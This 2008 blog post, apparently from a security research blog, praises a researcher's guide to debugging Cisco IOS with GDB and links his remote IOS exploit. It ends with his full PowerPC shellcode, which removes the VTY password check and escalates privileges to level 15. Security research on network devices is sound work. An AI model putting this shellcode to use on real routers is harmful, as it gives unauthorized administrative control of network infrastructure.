Step by Step Debugging Cisco IOS
aaron posted in Uncategorized on August 13th, 2008
This is kinda cool — I didn’t know that you could do this directly with GDB. Andy Davis has posted step by step instructions for debugging Cisco IOS with GDB. He’s done some other pretty interesting things lately including posting a remote exploit of IOS, and as a follow-up to the exploit he posted information on how his IOS shellcode works.
Other than a minor gdb patch, and a couple idiosyncrasies with the debugging process (you have to manually replace the instructions overwritten by breakpoint interrupts), from his instructions it looks like it’s pretty straightforward to do. I’m not sure of the details on how it’s able to attach to the kernel, but I’d like to try it out sometime. I wonder if some of this info will spur other security people to do more IOS research.
Andy’s IOS shellcode:
.equ vty_info, 0x8182da60 //contains a pointer to the VTY info structure .equ terminate, 0x80e4086c lis 4,vty_infoha la 4,vty_infol(4) xor 8,8,8 //Clear r8 lwzx 7,4,8 //Get pointer to VTY info structure stw 8,372(7) //Write zero to first offset to remove //the requirement to enter a password subi 8,8,1 //Set r8 to be 0xffffffff addi 7,7,233 //Add second offset in two steps to //avoid nulls in the shellcode stw 8,1226(7) //Write 0xffffffff to second offset to //priv escalate to level 15 //(technically this should be 0xff100000 //but 0xffffffff works and is more efficient) mr 3,8 //Use 0xffffffff as a parameter //to pass to terminate() lis 4,terminateha la 4,terminatel(4) mtctr 4 bctr //terminate "this process"